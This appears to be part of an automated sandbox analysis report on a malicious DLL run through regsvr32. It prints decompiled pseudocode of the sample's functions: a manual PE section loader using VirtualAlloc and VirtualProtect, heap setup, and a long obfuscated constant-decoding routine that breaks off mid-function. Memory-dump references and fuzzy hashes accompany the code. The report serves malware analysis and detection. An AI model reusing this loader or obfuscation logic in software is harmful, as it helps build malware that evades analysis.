				if(_a8[2] != 0) {
					if((_a8[3] & 0x02000000) == 0) {
						asm("sbb ecx, ecx");
						_v16 =  ~( ~(_a8[3] & 0x20000000));
						asm("sbb eax, eax");
						_v24 =  ~( ~(_a8[3] & 0x40000000));
						asm("sbb edx, edx");
						_v12 =  ~( ~(_a8[3] & 0x80000000));
						_t39 = _v24 * 8; // 0x10056f20
						_v20 =  *((intOrPtr*)((_v16 << 4) + _t39 + 0x10056f20 + _v12 * 4));
						if((_a8[3] & 0x04000000) != 0) {
							_v20 = _v20 | 0x00000200;
						}
						_t67 = VirtualProtect( *_a8, _a8[2], _v20,  &_v8); // executed
						if(_t67 != 0) {
							return 1;
						} else {
							return 0;
						}
					}
					if( *_a8 == _a8[1] && (_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x30) || _a8[2] %  *(_a4 + 0x30) == 0)) {
						VirtualFree( *_a8, _a8[2], 0x4000); // executed
					}
					return 1;
				}
				return 1;
			}

0x100021d6
0x100021e0
0x100021f8
0x10002262
0x10002266
0x10002276
0x1000227a
0x1000228b
0x1000228f
0x1000229b
0x100022a8
0x100022b6
0x100022c1
0x100022c1
0x100022d9
0x100022e1
0x00000000
0x100022e3
0x00000000
0x100022e3
0x100022e1
0x10002205
0x10002244
0x10002244
0x00000000
0x1000224a
0x00000000

APIs

VirtualFree.KERNELBASE(00000000,?,00004000,?,10002468,00000001,00000000,?,10002C68,?,?,?,?,10002C68,00000000,00000000), ref: 10002244

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
Instruction ID: def7816fd77fd5aef653724919a03fde70f7e86383ff2ba96e4cf8bb5acc80b5
Opcode Fuzzy Hash: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
Instruction Fuzzy Hash: 5A41B674600109AFEB44CF98C890BA9B7B6FB88350F25C659EC1A9F395C731EE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1001A305, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1001A305(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x1005ad4c = _t6;
				if(_t6 != 0) {
					_t7 = E1001A2AA(__eflags);
					__eflags = _t7 - 3;
					 *0x1005c984 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1001A57A(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x1005ad4c);
							 *0x1005ad4c =  *0x1005ad4c & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x1001a316
0x1001a31e
0x1001a323
0x1001a328
0x1001a32d
0x1001a330
0x1001a335
0x1001a35b
0x1001a35d
0x1001a35e
0x1001a337
0x1001a33c
0x1001a341
0x1001a344
0x00000000
0x1001a346
0x1001a34c
0x1001a352
0x00000000
0x1001a352
0x1001a344
0x1001a325
0x1001a325
0x1001a327
0x1001a327

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,1001796A,00000001,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C), ref: 1001A316
HeapDestroy.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001A34C

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
Instruction ID: 8ebff57b685a6f4636b50d0b354dfd0ee4d70228ae444a146c3f0929ed30e208
Opcode Fuzzy Hash: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
Instruction Fuzzy Hash: 93E06D71A193569EFB10AB308C9972536F4EB46386F104826F911CD4A0F7B0C6C09A01

Uniqueness

Uniqueness Score: -1.00%

Function 10002010, Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10002010(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t76;
				void* _t127;

				_v28 = __ecx;
				_t3 = _a16 + 4; // 0x104e9
				_v20 =  *_t3;
				_t7 =  *_a16 + 0x14; // 0x4a8bb445
				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x10002c17
				_v24 =  *_a16 + _t9;
				_v8 = 0;
				while(1) {
					_t17 =  *_a16 + 6; // 0xe9000001
					if(_v8 >= ( *_t17 & 0x0000ffff)) {
						break;
					}
					if( *(_v24 + 0x10) != 0) {
						_t41 = _v24 + 0x14; // 0x4a8bb445
						_t43 = _v24 + 0x10; // 0x8b118bbc
						if(E10001FE0(_v28, _a8,  *_t41 +  *_t43) != 0) {
							_t47 = _v24 + 0x10; // 0x8b118bbc
							_t50 = _v24 + 0xc; // 0x4d8b0000
							_t76 = VirtualAlloc(_v20 +  *_t50,  *_t47, 0x1000, 4); // executed
							_v12 = _t76;
							if(_v12 != 0) {
								_t55 = _v24 + 0xc; // 0x4d8b0000
								_v12 = _v20 +  *_t55;
								_t58 = _v24 + 0x10; // 0x8b118bbc
								_t61 = _v24 + 0x14; // 0x4a8bb445
								E10001E60(_v12, _a4 +  *_t61,  *_t58);
								_t127 = _t127 + 0xc;
								 *((intOrPtr*)(_v24 + 8)) = _v12;
								L1:
								_v8 = _v8 + 1;
								_v24 = _v24 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v16 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v16 <= 0) {
						L8:
						goto L1;
					}
					_t28 = _v24 + 0xc; // 0x4d8b0000
					_v12 = VirtualAlloc(_v20 +  *_t28, _v16, 0x1000, 4);
					if(_v12 != 0) {
						_t33 = _v24 + 0xc; // 0x4d8b0000
						_v12 = _v20 +  *_t33;
						 *((intOrPtr*)(_v24 + 8)) = _v12;
						E10001E10(_v12, 0, _v16);
						_t127 = _t127 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}

0x10002016
0x1000201c
0x1000201f
0x1000202c
0x10002030
0x10002034
0x10002037
0x10002052
0x10002057
0x1000205e
0x00000000
0x00000000
0x1000206b
0x100020d6
0x100020dc
0x100020ee
0x100020fe
0x10002108
0x1000210c
0x10002112
0x10002119
0x10002125
0x10002128
0x1000212e
0x10002138
0x10002140
0x10002145
0x1000214e
0x10002040
0x10002046
0x1000204f
0x00000000
0x1000204f
0x00000000
0x1000211b
0x00000000
0x100020f0
0x10002073
0x1000207a
0x100020ce
0x00000000
0x100020ce
0x1000208d
0x10002097
0x1000209e
0x100020ad
0x100020b0
0x100020b9
0x100020c6
0x100020cb
0x00000000
0x100020cb
0x00000000
0x100020a0
0x00000000

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,10002BFF,00000000), ref: 10002091
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10008AC6,8B118BBC,?,10002BFF,00000000,10008AC6,?), ref: 1000210C

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
Instruction ID: c265c5d024e1aaa08d03296b5d335ffe068feccc9d90f6e2fd2d76d71ec68577
Opcode Fuzzy Hash: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
Instruction Fuzzy Hash: 4E51DEB4A0020ADFDB04CF94C591AAEB7F1FF48344F208598E915AB355D771EE91CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10008860, Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E10008860(void* __eflags) {
				char* _v8;
				intOrPtr _v12;
				char _v16;
				char* _v20;
				void* __ebp;
				void* _t25;
				void* _t29;
				intOrPtr _t32;
				void* _t33;
				void* _t34;

				_v8 = E1001703B(_t25, _t29, _t33, _t34, 0x5f5e100);
				if(_v8 != 0) {
					_v12 = 0x5f5e100;
					_v16 = 0;
					_v20 = _v8;
					while(1) {
						__eflags = _v16 - 0x5f5e100;
						if(__eflags >= 0) {
							break;
						}
						 *_v20 = _v16;
						_v16 = _v16 + 1;
						_t32 = _v20 + 1;
						__eflags = _t32;
						_v20 = _t32;
					}
					_push(_v8); // executed
					E10016380(_t25, _t33, _t34, __eflags); // executed
					__eflags = _v16 - _v12;
					if(_v16 != _v12) {
						return 3;
					}
					return 0;
				}
				return 3;
			}

0x10008873
0x1000887a
0x10008883
0x1000888a
0x10008894
0x100088ab
0x100088ab
0x100088b2
0x00000000
0x00000000
0x100088ba
0x1000889f
0x100088a5
0x100088a5
0x100088a8
0x100088a8
0x100088c1
0x100088c2
0x100088cd
0x100088d0
0x00000000
0x100088d6
0x00000000
0x100088d2
0x00000000

APIs

_malloc.LIBCMT ref: 1000886B

Part of subcall function 1001703B: __FF_MSGBANNER.LIBCMT ref: 1001705E
Part of subcall function 1001703B: __NMSG_WRITE.LIBCMT ref: 10017065
Part of subcall function 1001703B: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001), ref: 100170B3

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
Instruction ID: 9e6909d06ecd8ca97a2f758cde8d66f904c366c92fb4d9c13ba1bad92c8ee0bf
Opcode Fuzzy Hash: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
Instruction Fuzzy Hash: 9A0178B4D0424CEFEB00CFA4C8446AEBBB4FB04354F60C8A9D9516B349E735AB00DB81

Uniqueness

Uniqueness Score: -1.00%

Function 04B9D11A, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 04B9D1B6

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction ID: 0d967bca3a4dec250765538be4dac5b7cbc640a5e9657dab0a54e2552420c8cf
Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction Fuzzy Hash: 5711E2B1C4430DEBDB54EFE5D94A6DEFBB0EB00749F108588D521B6250D3B89B489F91

Uniqueness

Uniqueness Score: -1.00%

Function 04BA061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04BA06E5

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: 2be8a21378aa3be8b31dbb6e8746c9d278de8ead9e127c75634a99b6f2265255
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: F82110B1C0130AABCF14DFA9D9899DEBFB5FB20354F108298E529A6251D3B49B04CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04B88636, Relevance: 39.9, Strings: 31, Instructions: 1175
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04B88636() {
				signed int _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				char _v56;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				char _v100;
				char _v108;
				signed int _v144;
				char _v152;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				unsigned int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				unsigned int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				unsigned int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				unsigned int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				unsigned int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				unsigned int _v676;
				signed int _t1259;
				signed int _t1287;
				signed int _t1299;
				signed int _t1310;
				signed int _t1340;
				signed int _t1341;
				signed int _t1343;
				signed int _t1344;
				signed int _t1345;
				signed int _t1346;
				signed int _t1347;
				signed int _t1348;
				signed int _t1349;
				signed int _t1350;
				signed int _t1351;
				signed int _t1352;
				signed int _t1353;
				signed int _t1354;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1359;
				signed int _t1360;
				signed int _t1361;
				signed int _t1362;
				signed int _t1363;
				signed int _t1364;
				signed int _t1365;
				signed int _t1384;
				signed int _t1465;
				signed int _t1466;
				signed int _t1469;
				signed int _t1482;
				signed int _t1495;
				signed int _t1498;
				void* _t1500;
				void* _t1504;
				void* _t1505;
				void* _t1506;

				_t1500 = (_t1498 & 0xfffffff8) - 0x2a0;
				_v548 = 0x612d76;
				_v548 = _v548 + 0xffffb226;
				_v548 = _v548 ^ 0x25733830;
				_v548 = _v548 + 0x94f7;
				_v548 = _v548 ^ 0x25147da1;
				_v608 = 0x8e6410;
				_v608 = _v608 | 0x5e5673b6;
				_v608 = _v608 ^ 0x9913f1ef;
				_v608 = _v608 * 0x3a;
				_t1469 = 0xe6d4a04;
				_v608 = _v608 ^ 0x4490702a;
				_v332 = 0x40e6a4;
				_v332 = _v332 ^ 0x1ba14b53;
				_v332 = _v332 ^ 0x1be1adf7;
				_v388 = 0xd7ca30;
				_t1343 = 0x42;
				_v388 = _v388 / _t1343;
				_v388 = _v388 + 0x3798;
				_v388 = _v388 ^ 0x000f1b75;
				_v216 = 0xd7fc5;
				_v216 = _v216 >> 1;
				_v216 = _v216 ^ 0x0004b337;
				_v516 = 0x59f14d;
				_v516 = _v516 >> 0xf;
				_t1344 = 0x4a;
				_v516 = _v516 / _t1344;
				_v516 = _v516 << 0xb;
				_v516 = _v516 ^ 0x00046054;
				_v304 = 0xedc603;
				_v304 = _v304 + 0xffffc02b;
				_v304 = _v304 ^ 0x00efeb53;
				_v232 = 0x637592;
				_t1465 = 0x6f;
				_t1345 = 0x31;
				_v232 = _v232 * 0x71;
				_v232 = _v232 ^ 0x2bef3074;
				_v372 = 0x919268;
				_v372 = _v372 << 9;
				_v372 = _v372 + 0x904f;
				_v372 = _v372 ^ 0x2324b0cf;
				_v484 = 0x568eb3;
				_v484 = _v484 * 0x42;
				_v484 = _v484 / _t1465;
				_v484 = _v484 ^ 0x0034ded9;
				_v472 = 0x365886;
				_v472 = _v472 << 0xc;
				_v472 = _v472 + 0xffff5d21;
				_v472 = _v472 ^ 0x6583ba5b;
				_v436 = 0xdfd34b;
				_v436 = _v436 / _t1345;
				_v436 = _v436 | 0x191717ac;
				_v436 = _v436 ^ 0x1914e100;
				_v196 = 0xd88df0;
				_t1346 = 0x15;
				_v196 = _v196 / _t1346;
				_v196 = _v196 ^ 0x0009e710;
				_v356 = 0xb64ed2;
				_v356 = _v356 >> 0xd;
				_t1340 = 0x1c;
				_t1347 = 0x51;
				_v356 = _v356 * 0x63;
				_v356 = _v356 ^ 0x0006dcaa;
				_v336 = 0x65c0e5;
				_v336 = _v336 * 0x7a;
				_v336 = _v336 >> 3;
				_v336 = _v336 ^ 0x060f054d;
				_v492 = 0x31a1;
				_v492 = _v492 ^ 0x5b528d22;
				_v492 = _v492 << 5;
				_v492 = _v492 ^ 0x6a59b43c;
				_v652 = 0x40a60;
				_v652 = _v652 | 0x6178721b;
				_v652 = _v652 + 0x8e9b;
				_v652 = _v652 / _t1340;
				_v652 = _v652 ^ 0x037a42dd;
				_v272 = 0xf0169f;
				_v272 = _v272 >> 5;
				_v272 = _v272 ^ 0x0004695a;
				_v528 = 0x24fae7;
				_v528 = _v528 ^ 0xfec3499d;
				_v528 = _v528 << 0xf;
				_v528 = _v528 >> 0xc;
				_v528 = _v528 ^ 0x0001af4c;
				_v188 = 0x9b8757;
				_v188 = _v188 >> 4;
				_v188 = _v188 ^ 0x000b2d6a;
				_v256 = 0x948fd;
				_v256 = _v256 ^ 0xf30bafdb;
				_v256 = _v256 ^ 0xf30b6e1f;
				_v464 = 0x93fe09;
				_v464 = _v464 / _t1347;
				_t1348 = 0x23;
				_v464 = _v464 * 0x7a;
				_v464 = _v464 ^ 0x00d327e8;
				_v648 = 0xd540cd;
				_v648 = _v648 * 0x5c;
				_v648 = _v648 >> 0xb;
				_v648 = _v648 / _t1348;
				_v648 = _v648 ^ 0x0005d45a;
				_v540 = 0x2acc1;
				_v540 = _v540 >> 7;
				_v540 = _v540 << 0x10;
				_t1349 = 0x59;
				_v540 = _v540 / _t1349;
				_v540 = _v540 ^ 0x000fef6f;
				_v264 = 0xfe7d93;
				_v264 = _v264 ^ 0x4bd787a7;
				_v264 = _v264 ^ 0x4b22b45d;
				_v208 = 0x23d5c9;
				_v208 = _v208 ^ 0x8f5a829d;
				_v208 = _v208 ^ 0x8f7555ae;
				_v524 = 0x2aaed2;
				_v524 = _v524 | 0x9661325e;
				_t1495 = 0x5c;
				_v524 = _v524 / _t1495;
				_v524 = _v524 * 0x63;
				_v524 = _v524 ^ 0xa1d330ca;
				_v612 = 0x173148;
				_v612 = _v612 >> 5;
				_v612 = _v612 + 0x14e7;
				_v612 = _v612 / _t1349;
				_v612 = _v612 ^ 0x0000773b;
				_v620 = 0xe48585;
				_v620 = _v620 << 0x10;
				_v620 = _v620 * 0x32;
				_v620 = _v620 >> 7;
				_v620 = _v620 ^ 0x0028030c;
				_v500 = 0xfd3bdc;
				_v500 = _v500 << 0xa;
				_v500 = _v500 ^ 0xf4e13163;
				_v520 = 0xe4fc5f;
				_v520 = _v520 + 0xa13e;
				_v520 = _v520 + 0xffff7828;
				_v520 = _v520 ^ 0x4d340404;
				_v520 = _v520 ^ 0x4dd63175;
				_v360 = 0x9532ce;
				_v360 = _v360 ^ 0xdad74cca;
				_v360 = _v360 | 0x8468d9e2;
				_v360 = _v360 ^ 0xde69f572;
				_v604 = 0x3a7c91;
				_v604 = _v604 | 0x10f1a45d;
				_v604 = _v604 + 0xffff6d1e;
				_v604 = _v604 | 0x776d764a;
				_v604 = _v604 ^ 0x77f7c5e5;
				_v212 = 0x6e3f57;
				_t279 =  &_v212; // 0x6e3f57
				_v212 =  *_t279 * 3;
				_v212 = _v212 ^ 0x01468193;
				_v220 = 0x58f789;
				_v220 = _v220 << 5;
				_v220 = _v220 ^ 0x0b1ef21b;
				_v236 = 0x737654;
				_v236 = _v236 + 0xe2b4;
				_v236 = _v236 ^ 0x0073a4da;
				_v416 = 0xc8c3a8;
				_v416 = _v416 ^ 0x4478b906;
				_v416 = _v416 * 0xc;
				_v416 = _v416 ^ 0x384ff3ff;
				_v576 = 0x407f47;
				_v576 = _v576 + 0x1a0d;
				_v576 = _v576 * 0x63;
				_v576 = _v576 << 2;
				_v576 = _v576 ^ 0x63e80fef;
				_v228 = 0x9b4b6;
				_v228 = _v228 + 0xffffd2d4;
				_v228 = _v228 ^ 0x000d2243;
				_v552 = 0xb96e33;
				_v552 = _v552 + 0x4381;
				_v552 = _v552 * 0xf;
				_v552 = _v552 + 0xffffbee9;
				_v552 = _v552 ^ 0x0ae545e5;
				_v560 = 0xe19e88;
				_v560 = _v560 | 0xc222c343;
				_v560 = _v560 / _t1465;
				_v560 = _v560 + 0x567c;
				_v560 = _v560 ^ 0x01c941bb;
				_v568 = 0xf463df;
				_v568 = _v568 | 0x401122c6;
				_v568 = _v568 >> 3;
				_v568 = _v568 | 0xf3373c61;
				_v568 = _v568 ^ 0xfb38c632;
				_v392 = 0xa88994;
				_v392 = _v392 >> 2;
				_v392 = _v392 + 0xfffffc92;
				_v392 = _v392 ^ 0x002883f3;
				_v544 = 0x16009;
				_v544 = _v544 ^ 0x700f0ae7;
				_v544 = _v544 << 0xd;
				_v544 = _v544 + 0xffffa581;
				_v544 = _v544 ^ 0xcd57c12d;
				_v400 = 0x4e3251;
				_v400 = _v400 << 0xd;
				_v400 = _v400 << 0xb;
				_v400 = _v400 ^ 0x510ef6f0;
				_v408 = 0xce49b4;
				_v408 = _v408 / _t1340;
				_v408 = _v408 | 0xa9ee0ad6;
				_v408 = _v408 ^ 0xa9ed29cd;
				_v368 = 0xfab4ff;
				_v368 = _v368 ^ 0x8bb4f731;
				_v368 = _v368 + 0x4788;
				_v368 = _v368 ^ 0x8b4dbddc;
				_v376 = 0x3b857d;
				_v376 = _v376 + 0xd8be;
				_v376 = _v376 ^ 0x0c7e0de1;
				_v376 = _v376 ^ 0x0c4b703c;
				_v384 = 0x702b67;
				_v384 = _v384 + 0x7016;
				_v384 = _v384 | 0xc6195e9d;
				_v384 = _v384 ^ 0xc67058d5;
				_v536 = 0xd092b2;
				_v536 = _v536 + 0xffff63c4;
				_v536 = _v536 | 0x81cb3080;
				_v536 = _v536 ^ 0x4ecdb7ae;
				_v536 = _v536 ^ 0xcf0bdc69;
				_v248 = 0xf8c39f;
				_v248 = _v248 | 0x0e89bf31;
				_v248 = _v248 ^ 0x0ef3b328;
				_v556 = 0x54f798;
				_v556 = _v556 >> 2;
				_v556 = _v556 ^ 0xd52f7ed0;
				_v556 = _v556 >> 6;
				_v556 = _v556 ^ 0x03531d7d;
				_v672 = 0xe1b7ad;
				_t1350 = 0x7a;
				_v672 = _v672 / _t1350;
				_v672 = _v672 << 0xc;
				_t1351 = 0xa;
				_v672 = _v672 / _t1351;
				_v672 = _v672 ^ 0x02f2c9f1;
				_v676 = 0xf0d76a;
				_v676 = _v676 >> 3;
				_v676 = _v676 + 0xffffb109;
				_v676 = _v676 >> 4;
				_v676 = _v676 ^ 0x0006f826;
				_v200 = 0xd1b71d;
				_t1352 = 0x7c;
				_v200 = _v200 / _t1352;
				_v200 = _v200 ^ 0x0006a6d0;
				_v596 = 0x496d6a;
				_t459 =  &_v596; // 0x496d6a
				_v596 =  *_t459 * 0x6b;
				_v596 = _v596 + 0xbb66;
				_v596 = _v596 + 0xffff602d;
				_v596 = _v596 ^ 0x1ebb8efb;
				_v404 = 0xf3863;
				_v404 = _v404 >> 0xe;
				_t1353 = 0x2a;
				_v404 = _v404 / _t1353;
				_v404 = _v404 ^ 0x00094758;
				_v476 = 0x611fd8;
				_v476 = _v476 | 0xb878f5dc;
				_v476 = _v476 + 0xad5b;
				_v476 = _v476 ^ 0xb87809fa;
				_v460 = 0xcf43a7;
				_v460 = _v460 ^ 0xdec9221b;
				_v460 = _v460 ^ 0xf00bdbd0;
				_v460 = _v460 ^ 0x2e089b39;
				_v340 = 0x6e2519;
				_v340 = _v340 + 0xffff23bc;
				_v340 = _v340 + 0xffffab38;
				_v340 = _v340 ^ 0x00658e81;
				_v468 = 0x6e95b3;
				_v468 = _v468 | 0xe42d871f;
				_v468 = _v468 + 0xffff0334;
				_v468 = _v468 ^ 0xe4661c95;
				_v184 = 0x976a3e;
				_v184 = _v184 >> 2;
				_v184 = _v184 ^ 0x002fb3e7;
				_v640 = 0xf929b2;
				_v640 = _v640 >> 4;
				_v640 = _v640 + 0x46ec;
				_t1354 = 0x4e;
				_v640 = _v640 * 0x14;
				_v640 = _v640 ^ 0x013b9ce5;
				_v288 = 0x293a87;
				_v288 = _v288 * 0x1a;
				_v288 = _v288 ^ 0x042f344b;
				_v300 = 0x77766c;
				_v300 = _v300 + 0xffff170c;
				_v300 = _v300 ^ 0x007d4cee;
				_v308 = 0x8e9aa4;
				_v308 = _v308 / _t1354;
				_v308 = _v308 ^ 0x00052c4e;
				_v456 = 0x218ab6;
				_v456 = _v456 / _t1340;
				_v456 = _v456 << 8;
